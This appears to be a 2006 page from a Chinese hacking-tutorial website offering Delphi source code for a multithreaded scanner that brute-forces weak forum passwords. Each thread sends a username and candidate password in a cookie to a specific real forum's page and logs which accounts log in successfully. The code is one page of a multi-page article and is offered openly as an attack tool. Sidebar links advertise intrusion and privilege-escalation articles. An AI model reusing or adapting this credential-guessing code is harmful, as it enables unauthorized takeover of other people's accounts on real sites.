黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 黑客编程 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[推荐]多线程扫描论坛弱口令(delphi源码)
      ★★★★★

多线程扫描论坛弱口令(delphi源码)

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-6-30 9:18:20

unit UtGetuserPsd;

interface

uses
  Classes,Idhttp,IdHeaderList,SysUtils;

type
  TGetUnserPsd = class(TThread)
  private
    { Private declarations }
  protected
    UN,pW:STRING;
    uid:integer;
    idp:TidHttp;
    HttpHead:TidHeaderList;
    procedure Execute; override;
  public
    Constructor Create(UserName:string;id:integer);
    Destructor Destroy; override;
  end;

implementation

uses UtMain;

{ Important: Methods and properties of objects in visual components can only be
  used in a method called using Synchronize, for example,

      Synchronize(UpdateCaption);

  and UpdateCaption could look like,

    procedure TGetUnserPsd.UpdateCaption;
    begin
      Form1.Caption := 'Updated in a thread';
    end; }

{ TGetUnserPsd }


constructor TgetUnserPsd.Create(Username:string;id:integer);
begin
  uid:=id;
  un:=username;
  idp:=Tidhttp.Create(nil);
  httpHead:=TidHeaderList.Create;
  inherited Create(false);
end;

destructor TgetUnserPsd.Destroy;
begin
  idp.Free;
  httphead.Free;
  inherited destroy;
end;

procedure TGetUnserPsd.Execute;
var
html:string;
begin
  freeonterminate:=true;
  httpHead.Text:='cookie: nowtime=20060131210233; cometime=21_02_05__21_02_05_0Content-type: text/html; clicks=20060131172355; style=; lasttxt=20060131122028; username='+
                un+'; password='+FmMain.Edit1.text+'; xuansave=; estate=; line=; qmh=; bgcolor=';
  idp.Request.CustomHeaders:=Httphead;
  try
    html:=idp.Get('http://www.netxeyes.com/cgi-bin/bbs3000/race.cgi'); //偿试打开骞马页面,如密码正确则能正常打开
  except
    try
      sleep(300);
      html:=idp.Get('http://www.netxeyes.com/cgi-bin/bbs3000/race.cgi');
    except
      FmMain.Memo5.Lines.Add(IntToStr(uid)+'  '+un+'  idhttp打开网页失败');
      Destroy;
      exit;
    end;
  end;
  if pos('出错提示',html)>0 then
  begin
    FmMain.Memo4.Lines.Add(IntToStr(uid)+'  '+un+'  登录失败');
  end
  else
  begin
    if pos('赛马中心',html)>0 then
    begin
      FmMain.Memo6.Lines.Add(IntToStr(uid)+'  '+un+'  登录成功');
    end
    else
      FmMain.Memo5.Lines.Add(IntToStr(uid)+'  '+un+'  返回未知');
  end;
    Destroy;
  { Place thread code here }
end;

end.

上一页  [1] [2] [3] [4] [5] 下一页

文章录入:cainiaowang    责任编辑:sygbox 
【字体:
Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
ICP备案:冀06009886